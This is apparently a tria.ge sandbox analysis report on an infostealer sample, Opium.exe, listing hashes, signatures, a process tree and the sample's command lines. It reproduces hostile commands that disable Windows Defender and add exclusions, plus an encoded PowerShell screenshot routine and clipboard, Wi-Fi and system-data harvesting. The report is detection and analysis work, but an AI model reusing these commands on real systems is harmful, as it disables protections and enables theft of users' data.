Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
104s -
max time network
111s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
16/04/2024, 17:47
General
-
Target
Opium.exe
-
Size
6.3MB
-
MD5
51a4b92d3d474b74c99f9bf8006adcf8
-
SHA1
876c3445e81651d207beedcdbc42384b7c6579f5
-
SHA256
25f1cc14c6f92b5300f016dbd6fae84ccd5e8c95cada73463b3b4963fcf12f16
-
SHA512
7aec357d2b1ed372f193ebed8a3dde3ece67d7ca76036c0a00c74141ea15a8dac4d6c1a34a9cc039110e993c6b4fbc11d85a251a69224752620badbe0a340778
-
SSDEEP
98304:CQ91G75YthUySccRacg/BGfO1q4HNK0zbup/xzcq8zAFPjv9JT1sOBN3o1SX:F45e6ySraRRnz+R8zmPf1D7JX
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Opium.exe -
ACProtect 1.3x - 1.4x DLL software 16 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000100000002aa53-21.dat acprotect behavioral1/files/0x000100000002aa46-27.dat acprotect behavioral1/files/0x000100000002aa51-30.dat acprotect behavioral1/files/0x000100000002aa52-35.dat acprotect behavioral1/files/0x000100000002aa50-34.dat acprotect behavioral1/files/0x000100000002aa49-44.dat acprotect behavioral1/files/0x000100000002aa48-43.dat acprotect behavioral1/files/0x000100000002aa47-42.dat acprotect behavioral1/files/0x000100000002aa45-41.dat acprotect behavioral1/files/0x000100000002aa58-40.dat acprotect behavioral1/files/0x000100000002aa57-39.dat acprotect behavioral1/files/0x000100000002aa56-38.dat acprotect behavioral1/files/0x000100000002aa4b-46.dat acprotect behavioral1/files/0x000100000002aa4d-48.dat acprotect behavioral1/files/0x000100000002aa4c-47.dat acprotect behavioral1/files/0x000100000002aa4a-45.dat acprotect -
Executes dropped EXE 1 IoCs
pid Process 1444 rar.exe -
Loads dropped DLL 16 IoCs
pid Process 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe 4308 Opium.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000100000002aa53-21.dat upx behavioral1/memory/4308-24-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/files/0x000100000002aa46-27.dat upx behavioral1/memory/4308-29-0x0000000074FC0000-0x0000000074FDE000-memory.dmp upx behavioral1/files/0x000100000002aa51-30.dat upx behavioral1/memory/4308-32-0x0000000074FB0000-0x0000000074FBD000-memory.dmp upx behavioral1/files/0x000100000002aa52-35.dat upx behavioral1/files/0x000100000002aa50-34.dat upx behavioral1/files/0x000100000002aa49-44.dat upx behavioral1/files/0x000100000002aa48-43.dat upx behavioral1/files/0x000100000002aa47-42.dat upx behavioral1/files/0x000100000002aa45-41.dat upx behavioral1/files/0x000100000002aa58-40.dat upx behavioral1/files/0x000100000002aa57-39.dat upx behavioral1/files/0x000100000002aa56-38.dat upx behavioral1/files/0x000100000002aa4b-46.dat upx behavioral1/files/0x000100000002aa4d-48.dat upx behavioral1/files/0x000100000002aa4c-47.dat upx behavioral1/files/0x000100000002aa4a-45.dat upx behavioral1/memory/4308-54-0x0000000074F80000-0x0000000074FA7000-memory.dmp upx behavioral1/memory/4308-56-0x0000000074F60000-0x0000000074F78000-memory.dmp upx behavioral1/memory/4308-58-0x0000000074F40000-0x0000000074F5B000-memory.dmp upx behavioral1/memory/4308-60-0x0000000074E00000-0x0000000074F37000-memory.dmp upx behavioral1/memory/4308-63-0x0000000074DE0000-0x0000000074DF6000-memory.dmp upx behavioral1/memory/4308-64-0x0000000074DA0000-0x0000000074DAC000-memory.dmp upx behavioral1/memory/4308-66-0x0000000074D70000-0x0000000074D9C000-memory.dmp upx behavioral1/memory/4308-69-0x00000000749E0000-0x0000000074D6C000-memory.dmp upx behavioral1/memory/4308-70-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/memory/4308-71-0x0000000074930000-0x00000000749D9000-memory.dmp upx behavioral1/memory/4308-73-0x0000000074FC0000-0x0000000074FDE000-memory.dmp upx behavioral1/memory/4308-76-0x00000000748D0000-0x00000000748E0000-memory.dmp upx behavioral1/memory/4308-78-0x00000000748C0000-0x00000000748CC000-memory.dmp upx behavioral1/memory/4308-77-0x0000000074780000-0x0000000074898000-memory.dmp upx behavioral1/memory/4308-86-0x0000000074F40000-0x0000000074F5B000-memory.dmp upx behavioral1/memory/4308-110-0x0000000074E00000-0x0000000074F37000-memory.dmp upx behavioral1/memory/4308-111-0x0000000074DE0000-0x0000000074DF6000-memory.dmp upx behavioral1/memory/4308-142-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/memory/4308-143-0x0000000074FC0000-0x0000000074FDE000-memory.dmp upx behavioral1/memory/4308-151-0x0000000074D70000-0x0000000074D9C000-memory.dmp upx behavioral1/memory/4308-152-0x00000000749E0000-0x0000000074D6C000-memory.dmp upx behavioral1/memory/4308-153-0x0000000074930000-0x00000000749D9000-memory.dmp upx behavioral1/memory/4308-157-0x0000000074D70000-0x0000000074D9C000-memory.dmp upx behavioral1/memory/4308-158-0x00000000749E0000-0x0000000074D6C000-memory.dmp upx behavioral1/memory/4548-168-0x00000000032F0000-0x0000000003300000-memory.dmp upx behavioral1/memory/4308-321-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/memory/4308-322-0x0000000074FC0000-0x0000000074FDE000-memory.dmp upx behavioral1/memory/4308-336-0x0000000074E00000-0x0000000074F37000-memory.dmp upx behavioral1/memory/4308-426-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/memory/4308-469-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/memory/4308-484-0x0000000075030000-0x0000000075540000-memory.dmp upx behavioral1/memory/4308-485-0x0000000074FC0000-0x0000000074FDE000-memory.dmp upx behavioral1/memory/4308-486-0x0000000074FB0000-0x0000000074FBD000-memory.dmp upx behavioral1/memory/4308-487-0x0000000074F80000-0x0000000074FA7000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 14 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 10 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4116 WMIC.exe 1956 WMIC.exe 2108 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2064 tasklist.exe 3188 tasklist.exe 1988 tasklist.exe 3004 tasklist.exe 484 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4860 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3640 powershell.exe 4820 powershell.exe 3640 powershell.exe 4820 powershell.exe 4548 powershell.exe 4548 powershell.exe 4548 powershell.exe 4548 powershell.exe 4832 powershell.exe 4832 powershell.exe 4156 powershell.exe 4156 powershell.exe 4832 powershell.exe 4156 powershell.exe 3224 powershell.exe 3224 powershell.exe 3892 powershell.exe 3892 powershell.exe 3868 chrome.exe 3868 chrome.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2064 tasklist.exe Token: SeIncreaseQuotaPrivilege 4704 WMIC.exe Token: SeSecurityPrivilege 4704 WMIC.exe Token: SeTakeOwnershipPrivilege 4704 WMIC.exe Token: SeLoadDriverPrivilege 4704 WMIC.exe Token: SeSystemProfilePrivilege 4704 WMIC.exe Token: SeSystemtimePrivilege 4704 WMIC.exe Token: SeProfSingleProcessPrivilege 4704 WMIC.exe Token: SeIncBasePriorityPrivilege 4704 WMIC.exe Token: SeCreatePagefilePrivilege 4704 WMIC.exe Token: SeBackupPrivilege 4704 WMIC.exe Token: SeRestorePrivilege 4704 WMIC.exe Token: SeShutdownPrivilege 4704 WMIC.exe Token: SeDebugPrivilege 4704 WMIC.exe Token: SeSystemEnvironmentPrivilege 4704 WMIC.exe Token: SeRemoteShutdownPrivilege 4704 WMIC.exe Token: SeUndockPrivilege 4704 WMIC.exe Token: SeManageVolumePrivilege 4704 WMIC.exe Token: 33 4704 WMIC.exe Token: 34 4704 WMIC.exe Token: 35 4704 WMIC.exe Token: 36 4704 WMIC.exe Token: SeDebugPrivilege 3640 powershell.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeIncreaseQuotaPrivilege 4704 WMIC.exe Token: SeSecurityPrivilege 4704 WMIC.exe Token: SeTakeOwnershipPrivilege 4704 WMIC.exe Token: SeLoadDriverPrivilege 4704 WMIC.exe Token: SeSystemProfilePrivilege 4704 WMIC.exe Token: SeSystemtimePrivilege 4704 WMIC.exe Token: SeProfSingleProcessPrivilege 4704 WMIC.exe Token: SeIncBasePriorityPrivilege 4704 WMIC.exe Token: SeCreatePagefilePrivilege 4704 WMIC.exe Token: SeBackupPrivilege 4704 WMIC.exe Token: SeRestorePrivilege 4704 WMIC.exe Token: SeShutdownPrivilege 4704 WMIC.exe Token: SeDebugPrivilege 4704 WMIC.exe Token: SeSystemEnvironmentPrivilege 4704 WMIC.exe Token: SeRemoteShutdownPrivilege 4704 WMIC.exe Token: SeUndockPrivilege 4704 WMIC.exe Token: SeManageVolumePrivilege 4704 WMIC.exe Token: 33 4704 WMIC.exe Token: 34 4704 WMIC.exe Token: 35 4704 WMIC.exe Token: 36 4704 WMIC.exe Token: SeIncreaseQuotaPrivilege 4116 WMIC.exe Token: SeSecurityPrivilege 4116 WMIC.exe Token: SeTakeOwnershipPrivilege 4116 WMIC.exe Token: SeLoadDriverPrivilege 4116 WMIC.exe Token: SeSystemProfilePrivilege 4116 WMIC.exe Token: SeSystemtimePrivilege 4116 WMIC.exe Token: SeProfSingleProcessPrivilege 4116 WMIC.exe Token: SeIncBasePriorityPrivilege 4116 WMIC.exe Token: SeCreatePagefilePrivilege 4116 WMIC.exe Token: SeBackupPrivilege 4116 WMIC.exe Token: SeRestorePrivilege 4116 WMIC.exe Token: SeShutdownPrivilege 4116 WMIC.exe Token: SeDebugPrivilege 4116 WMIC.exe Token: SeSystemEnvironmentPrivilege 4116 WMIC.exe Token: SeRemoteShutdownPrivilege 4116 WMIC.exe Token: SeUndockPrivilege 4116 WMIC.exe Token: SeManageVolumePrivilege 4116 WMIC.exe Token: 33 4116 WMIC.exe Token: 34 4116 WMIC.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe 3868 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1604 wrote to memory of 4308 1604 Opium.exe 80 PID 1604 wrote to memory of 4308 1604 Opium.exe 80 PID 1604 wrote to memory of 4308 1604 Opium.exe 80 PID 4308 wrote to memory of 892 4308 Opium.exe 84 PID 4308 wrote to memory of 892 4308 Opium.exe 84 PID 4308 wrote to memory of 892 4308 Opium.exe 84 PID 4308 wrote to memory of 4776 4308 Opium.exe 85 PID 4308 wrote to memory of 4776 4308 Opium.exe 85 PID 4308 wrote to memory of 4776 4308 Opium.exe 85 PID 4308 wrote to memory of 5068 4308 Opium.exe 88 PID 4308 wrote to memory of 5068 4308 Opium.exe 88 PID 4308 wrote to memory of 5068 4308 Opium.exe 88 PID 4308 wrote to memory of 1320 4308 Opium.exe 90 PID 4308 wrote to memory of 1320 4308 Opium.exe 90 PID 4308 wrote to memory of 1320 4308 Opium.exe 90 PID 892 wrote to memory of 4820 892 cmd.exe 93 PID 892 wrote to memory of 4820 892 cmd.exe 93 PID 892 wrote to memory of 4820 892 cmd.exe 93 PID 4776 wrote to memory of 3640 4776 cmd.exe 92 PID 4776 wrote to memory of 3640 4776 cmd.exe 92 PID 4776 wrote to memory of 3640 4776 cmd.exe 92 PID 5068 wrote to memory of 2064 5068 cmd.exe 94 PID 5068 wrote to memory of 2064 5068 cmd.exe 94 PID 5068 wrote to memory of 2064 5068 cmd.exe 94 PID 1320 wrote to memory of 4704 1320 cmd.exe 95 PID 1320 wrote to memory of 4704 1320 cmd.exe 95 PID 1320 wrote to memory of 4704 1320 cmd.exe 95 PID 4308 wrote to memory of 3364 4308 Opium.exe 97 PID 4308 wrote to memory of 3364 4308 Opium.exe 97 PID 4308 wrote to memory of 3364 4308 Opium.exe 97 PID 3364 wrote to memory of 3404 3364 cmd.exe 99 PID 3364 wrote to memory of 3404 3364 cmd.exe 99 PID 3364 wrote to memory of 3404 3364 cmd.exe 99 PID 4308 wrote to memory of 3184 4308 Opium.exe 100 PID 4308 wrote to memory of 3184 4308 Opium.exe 100 PID 4308 wrote to memory of 3184 4308 Opium.exe 100 PID 3184 wrote to memory of 3668 3184 cmd.exe 102 PID 3184 wrote to memory of 3668 3184 cmd.exe 102 PID 3184 wrote to memory of 3668 3184 cmd.exe 102 PID 4308 wrote to memory of 5028 4308 Opium.exe 103 PID 4308 wrote to memory of 5028 4308 Opium.exe 103 PID 4308 wrote to memory of 5028 4308 Opium.exe 103 PID 5028 wrote to memory of 4116 5028 cmd.exe 105 PID 5028 wrote to memory of 4116 5028 cmd.exe 105 PID 5028 wrote to memory of 4116 5028 cmd.exe 105 PID 4308 wrote to memory of 3968 4308 Opium.exe 106 PID 4308 wrote to memory of 3968 4308 Opium.exe 106 PID 4308 wrote to memory of 3968 4308 Opium.exe 106 PID 3968 wrote to memory of 1956 3968 cmd.exe 167 PID 3968 wrote to memory of 1956 3968 cmd.exe 167 PID 3968 wrote to memory of 1956 3968 cmd.exe 167 PID 4308 wrote to memory of 768 4308 Opium.exe 200 PID 4308 wrote to memory of 768 4308 Opium.exe 200 PID 4308 wrote to memory of 768 4308 Opium.exe 200 PID 768 wrote to memory of 4548 768 cmd.exe 111 PID 768 wrote to memory of 4548 768 cmd.exe 111 PID 768 wrote to memory of 4548 768 cmd.exe 111 PID 4308 wrote to memory of 4972 4308 Opium.exe 112 PID 4308 wrote to memory of 4972 4308 Opium.exe 112 PID 4308 wrote to memory of 4972 4308 Opium.exe 112 PID 4308 wrote to memory of 1792 4308 Opium.exe 113 PID 4308 wrote to memory of 1792 4308 Opium.exe 113 PID 4308 wrote to memory of 1792 4308 Opium.exe 113 PID 4308 wrote to memory of 2324 4308 Opium.exe 116 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3512 attrib.exe 3588 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Opium.exe"C:\Users\Admin\AppData\Local\Temp\Opium.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\Opium.exe"C:\Users\Admin\AppData\Local\Temp\Opium.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Opium.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Opium.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4972
-
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1792
-
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2324
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:3256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:844
-
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4984
-
C:\Windows\SysWOW64\tree.comtree /A /F4⤵PID:2984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:3388
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵PID:3800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2352
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3512
-
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUA